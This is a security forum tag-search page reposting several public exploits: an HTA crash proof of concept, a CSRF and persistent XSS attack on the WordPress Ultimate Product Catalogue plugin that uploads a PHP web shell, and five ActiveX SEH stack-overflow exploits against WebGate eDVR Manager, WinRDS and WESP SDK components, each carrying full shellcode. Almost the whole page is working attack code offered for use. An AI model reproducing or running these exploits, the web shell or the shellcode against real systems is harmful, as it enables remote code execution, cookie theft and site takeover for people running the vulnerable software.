Search the Community
Showing results for tags 'var'.
-
/* #[+] Author: Mohammad Reza Espargham #[+] Title: MS Windows HTA (HTML Aplication) - Crash PoC #[+] Date: 19-05-2015 #[+] Tested on: Win7 dash> save below code as Crash.hta file and Double Click on it Crash... */ <html> <title>Mohammad Reza Espargham</title> </br> <body onload="javascript:ReZa();"></body> <script> function ReZa() { var buffer = '\x43'; var buffer1 = '\x42'; var buffer2 = '\x41'; for (i =0;i<956;i++) { buffer+=buffer+'\x42'; document.write('<>'+buffer+buffer1+buffer2); }} </script> </html> Source @alinpetre abia a aparut pe packetstorm verifica si tu inainte sa comentezi.
-
# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate Product Catalogue 3.1.2 # Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/" # Date: 22/04/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/ # Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip # Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.5 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary: Ultimate Product Catalogue is a responsive and easily customizable plugin for all your product catalogue needs. It has +63.000 downloads, +4.000 active installations. Product Name and Description and File Upload formulary of plugin Ultimate Product Catalog lacks of proper CSRF protection and proper filtering. Allowing an attacker to alter a product pressented to a customer or the wordpress administrators and insert XSS in his product name and description. It also allows an attacker to upload a php script though a CSRF due to a lack of file type filtering when uploading it. 2. Vulnerability timeline: - 22/04/2015: Identified in version 3.1.2 - 22/04/2015: Comunicated to developer company etoilewebdesign.com - 22/04/2015: Response from etoilewebdesign.com and fixed two SQLi in 3.1.3 but not these vulnerabilities. - 28/04/2015: Fixed version in 3.1.5 without notifying me. 3. Vulnerable code: In file html/ProductPage multiple lines. 3. Proof of concept: https://www.youtube.com/watch?v=roB_ken6U4o ---------------------------------------------------------------------------------------------- ------------- CSRF & XSS in Product Description and Name ----------- ---------------------------------------------------------------------------------------------- <iframe width=0 height=0 style="display:none" name="csrf-frame"></iframe> <form method='POST' action='http:// <web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16' target="csrf-frame" id="csrf-form"> <input type='hidden' name='action' value='Edit_Product'> <input type='hidden' name='_wp_http_referer' value='/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'/> <input type='hidden' name='Item_Name' value="Product name</a><script>alert('Product Name says: '+document.cookie)</script><a>"/> <input type='hidden' name='Item_Slug' value='asdf'/> <input type='hidden' name='Item_ID' value='16'/> <input type='hidden' name='Item_Image' value=' http://i.imgur.com/6cWKujq.gif'> <input type='hidden' name='Item_Price' value='666'> <input type='hidden' name='Item_Description' value="Product description says<script>alert('Product description says: '+document.cookie)</script>"/> <input type='hidden' name='Item_SEO_Description' value='seo desc'> <input type='hidden' name='Item_Link' value=''> <input type='hidden' name='Item_Display_Status' value='Show'> <input type='hidden' name='Category_ID' value=''> <input type='hidden' name='SubCategory_ID' value=''> <input style="display:none" type='submit' value='submit'> </form> <script>document.getElementById("csrf-form").submit()</script> ---------------------------------------------------------------------------------------------- -------- CSRF & File Upload in Product Description and Name ------ ---------------------------------------------------------------------------------------------- <html> <body onload="submitRequest();"> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_AddProductSpreadsheet&DisplayPage=Product", true); xhr.setRequestHeader("Host", "<web>"); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"); xhr.setRequestHeader("Cache-Control", "max-age=0"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8,es;q=0.6"); xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36"); xhr.setRequestHeader("Accept-Encoding", "gzip, deflate"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundarylPTZvbxAcw0q01W3"); var body = "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" + "Content-Disposition: form-data; name=\"Products_Spreadsheet\"; filename=\"cooldog.php\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "<?php\r\n" + "exec($_GET['c'],$output);\r\n" + "foreach ($output as $line) {\r\n" + "echo \"<br/>\".$line;\r\n" + "}\r\n" + "?>\r\n" + "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" + "Content-Disposition: form-data; name='submit'\r\n" + "\r\n" + "Add New Products\r\n" + "------WebKitFormBoundarylPTZvbxAcw0q01W3--\r\n" ; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input style="display:none;" type="submit" value="Up!" onclick="submitRequest();" /> </form> </body> </html> Te file cooldog.php is no available in path http:// <web>/wp-content/plugins/ultimate-product-catalogue/product-sheets/cooldog.php Source
-
WebGate eDVR Manager 2.6.4 Connect Method Stack Buffer Overflow
Aerosol posted a topic in Exploituri
<html> <!-- # Exploit Title: WebGate eDVR Manager Connect Method Stack Buffer Overflow # Date: 01st April, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174 # Tested on: Windows XP SP3 using IE8 # CVE : 2015-2097 targetFile = "C:\WINDOWS\system32\WESPSDK\WESPSerialPort.dll" prototype = "Sub Connect ( ByVal IPAddr As String , ByVal PortNum As Integer , ByVal UserID As String , ByVal Password As String )" progid = "WESPSERIALPORTLib.WESPSerialPortCtrl" Tested on IE8 Author: Praveen Darshanam http://blog.disects.com/ http://darshanams.blogspot.com/ P.S. Do not remove back slashes in shellcode and other variables --> <object classid='clsid:BAAA6516-267C-466D-93F5-C504EF973837' id='target'> </object> <script> var arg1="PraveenD"; var arg2=1; var arg3= ""; var arg4="PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for (i=0; i<1664; i++) { arg3 += "B"; } var nseh = "\xeb\x10PD"; //WESPSerialPort.dll(0x100104e7 = pop pop ret) var seh = "\xe7\x04\x01\x10"; for (i=0;i<80; i++) { nops += "\x90"; } shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(8000 - (arg3.length + nseh.length + seh.length + nops.length + shellcode.length)); i++) { buff2 += "A"; } fbuff = arg3 + nseh + seh + nops + shellcode + buff2; target.Connect(arg1, arg2, fbuff ,arg4); </script> </html> Source-
- arg4=praveend;
- i=0;
-
(and 3 more)
Tagged with:
-
<html> <!-- # Exploit Title: WebGate eDVR Manager AudioOnlySiteChannel Property Stack Buffer Overflow # Date: 01st April, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174 # Version: eDVR Manager 2.6.4 # Tested on: Windows XP SP3 using IE6/7/8 # CVE : 2015-2098 targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll" prototype = "Property Let AudioOnlySiteChannel ( ByVal SiteSerialNumber As String , ByVal Channel As Integer ) As Long" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" Tested on IE6/7/8 Author: Praveen Darshanam http://darshanams.blogspot.com/ http://blog.disects.com/ P.S. Do not remove back slashes in shellcode and other variables --> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'> </object> <script> var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for (i=0; i<128; i++) { arg1 += "B"; } var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for (i=0;i<80; i++) { nops += "\x90"; } shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++) { buff2 += "A"; } fbuff = arg1 + nseh + seh + nops + shellcode + buff2; target.AudioOnlySiteChannel(fbuff ,arg2 ) = arg3 </script> </html> Source
-
<html> <!-- # Exploit Title: WESP SDK ChangePassword Stack Overflow # Date: 01st April, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/bbs/zboard.php?id=sdk_pds_eng # Version: WESP SDK (package version 1.2) # Tested on: Windows XP SP3 using IE6/7/8 # CVE : 2015-2097 targetFile = "C:\Windows\System32\WESPSDK\WESPConfig.dll" prototype = "Function ChangePassword ( ByVal oldPwd As String , ByVal newPwd As String ) As Integer" progid = "WESPCONFIGLib.UserItem" Tested on IE6/7/8 Author: Praveen Darshanam http://darshanams.blogspot.com/ http://blog.disects.com/ P.S. Do not remove back slashes in shellcode and other variables --> <object classid='clsid:9B61891E-D876-476E-B1E8-AA662F332004' id='target'> </object> <script> var arg1 = ""; var arg2 = "PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for (i=0; i<248; i++) { arg1 += "B"; } var nseh = "\xeb\x10PD"; //WESPConfig.dll(0x10022f35 = pop pop pop ret) var seh = "\x3d\x2f\x02\x10"; for (i=0;i<80; i++) { nops += "\x90"; } shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++) { buff2 += "A"; } fbuff = arg1 + nseh + seh + nops + shellcode + buff2; target.ChangePassword(fbuff ,arg2); </script> </html> Source
-
<html> <title>WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Vulnerability (0Day)</title> <!-- # Exploit Title: WebGate WinRDS StopSiteAllChannel Stack Overflow SEH Overwrite (0Day) # Google Dork: [if relevant] (we will automatically add these to the GHDB) # Date: 27th March, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36 # Version: WinRDS 2.0.8 # Tested on: Windows XP SP3 using IE/6/7/8 # CVE : 2015-2094 targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll" prototype = "Sub StopSiteAllChannel ( ByVal SiteSerialNumber As String )" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" Vulnerable Product = WinRDS 2.0.8 Software = http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36 --> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='ssac'> </object> <script> var buff1 = ""; var nops = ""; var buff2 = ""; for (i=0;i<128; i++) { buff1 += "B"; } nseh = "\xeb\x08PD"; //pop pop ret = 1007f2a0 (0x1007f29e) 1007f2a0 var seh = "\xa0\xf2\x07\x10"; for (i=0;i<80; i++) { nops += "\x90"; } sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(5000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++) { buff2 += "A"; } fbuff = buff1 + nseh + seh + nops + sc + buff2; ssac.StopSiteAllChannel(fbuff); </script> </html> Source
-
<html> <!-- # Exploit Title: WebGate eDVR Manager WESPMonitor.WESPMonitorCtrl LoadImage Stack Buffer Overflow Remote Code Execution (0 day) # Date: 26th MArch, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174 # Version: 1, 6, 42, 0 # Tested on: Windows XP SP3 (IE6/7/8) # CVE : 2015-2097 targetFile = "C:\Windows\System32\WESPSDK\WESPMonitor.dll" prototype = "Sub LoadImage ( ByVal bstrFullPath As String )" memberName = "LoadImage" progid = "WESPMONITORLib.WESPMonitorCtrl" argCount = 1 For full analysis of the exploit refer http://blog.disects.com/2015/03/webgate-edvr-manager.html --> <object classid='clsid:B19147A0-C2FD-4B1F-BD20-3A3E1ABC4FC3' id='target'> </object> <script> var arg1 = ""; nops = ""; var buff = ""; for(i=0;i<268;i++) { arg1 += "B"; } nseh = "\xeb\x10\x90\x90"; //jmp over addr seh = "\x71\x47\x01\x10"; //pop pop ret addr document.write("</br>"+"Lengths: arg1="+arg1.length+" seh="+seh.length+"</br>"); for(i=0;i<200;i++) { nops += "\x90"; } sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for(i=0;i<(4000-(arg1.length + seh.length + nseh.length + nops.length+ sc.length));i++) { buff += "A"; } // [junk buffer][next SEH(jump)][SE Handler (pop pop ret)][Shellcode] fbuff = arg1 + nseh + seh + nops + sc + buff; target.LoadImage(fbuff); </script> </html> Source
-
